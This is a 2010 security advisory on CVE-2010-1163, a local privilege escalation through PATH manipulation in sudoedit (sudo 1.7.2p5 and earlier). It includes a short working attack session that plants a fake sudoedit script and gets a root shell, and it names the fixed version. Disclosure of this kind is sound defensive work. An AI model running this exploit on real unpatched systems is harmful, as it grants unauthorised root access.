Security Advisory @ Mediaservice.net Srl (#02, 19/04/2010) Data Security Division Title: sudoedit local privilege escalation through PATH manipulation Application: sudo <= 1.7.2p5 Platform: Linux, maybe others Description: A local user with permission to run the sudoedit pseudo-command can gain root privileges, through manipulation of the PATH environment variable. Authors: Valerio Costamagna Maurizio Agazzini Vendor Status: sudo team notified on 26/03/2010 CVE Candidate: The Common Vulnerabilities and Exposures project has assigned the name CVE-2010-1163 to this issue. References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163 http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html 1. Abstract. While writing an article about the vulnerability outlined in CVE-2010-0426, we found a distinct security flaw, also related to the sudoedit pseudo-command. Specifically, the path component of sudoedit is not checked correctly. This can be easily exploited by a local user with permission to run sudoedit, in order to execute arbitrary commands as root. 2. Example Attack Session. inode@pandora:~$ echo "/bin/sh" > sudoedit inode@pandora:~$ /usr/bin/chmod +x sudoedit inode@pandora:~$ id uid=1000(inode) gid=100(users) groups=100(users) inode@pandora:~$ export PATH=. inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts Password: sh-3.1# /usr/bin/id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk), 10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power), 86(netdev),93(scanner) sh-3.1# 3. Affected Platforms. All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this vulnerability requires that the /etc/sudoers file be configured to allow the attacker to run sudoedit. 4. Fix. On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which fixes the described vulnerability. 5. Proof Of Concept. See Example Attack Session above. Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.